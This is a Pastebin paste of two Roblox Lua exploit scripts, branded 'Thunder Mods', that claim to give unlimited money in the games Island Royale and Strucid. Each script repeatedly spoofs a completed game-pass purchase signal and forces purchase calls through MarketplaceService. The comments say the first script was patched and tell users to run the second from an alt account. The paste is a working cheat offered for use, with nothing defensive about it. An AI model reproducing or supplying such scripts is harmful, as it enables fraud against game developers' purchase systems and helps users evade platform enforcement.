Script_Master132

Island Royal inf money

Apr 30th, 2019
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.42 KB | None | 0 0
  1. -- Thunder Mods Loves you, Now love Thunder Mods back by subscribing and turning on notifications..
  2.  
  3.  
  4. local gamePassId = 6131490
  5. local market = game:GetService("MarketplaceService")
  6. local http = game:GetService("HttpService")
  7. local info = market:GetProductInfo(gamePassId, Enum.InfoType.GamePass)
  8. game:GetService("RunService").Stepped:connect(function()
  9. market:SignalPromptGamePassPurchaseFinished(game:GetService("Players").LocalPlayer, gamePassId, true)
  10. market:PerformPurchase(Enum.InfoType.Asset, info["ProductId"], info["PriceInRobux"], http:GenerateGUID(false))
  11. end)
  12.  
  13. ----------------------------------------------------------------------------------------------------------------------------
  14. -- Script for island royale got patched real quick just after I released it but fear not. i got another,
  15. -- OP Script for you guys for STRUCID. IT WILL GIVE U UNLIMITED MONEY
  16.  
  17.  
  18. -- EXECUTE THIS IN STRUCID FROM ALT ACCOUNT AND HAIL THUNDER MODS
  19.  
  20. local gamePassId = 5265144
  21. local market = game:GetService("MarketplaceService")
  22. local http = game:GetService("HttpService")
  23. local info = market:GetProductInfo(gamePassId, Enum.InfoType.GamePass)
  24. game:GetService("RunService").Stepped:connect(function()
  25. market:SignalPromptGamePassPurchaseFinished(game:GetService("Players").LocalPlayer, gamePassId, true)
  26. market:PerformPurchase(Enum.InfoType.Asset, info["ProductId"], info["PriceInRobux"], http:GenerateGUID(false))
  27. end)
Add Comment
Please, Sign In to add comment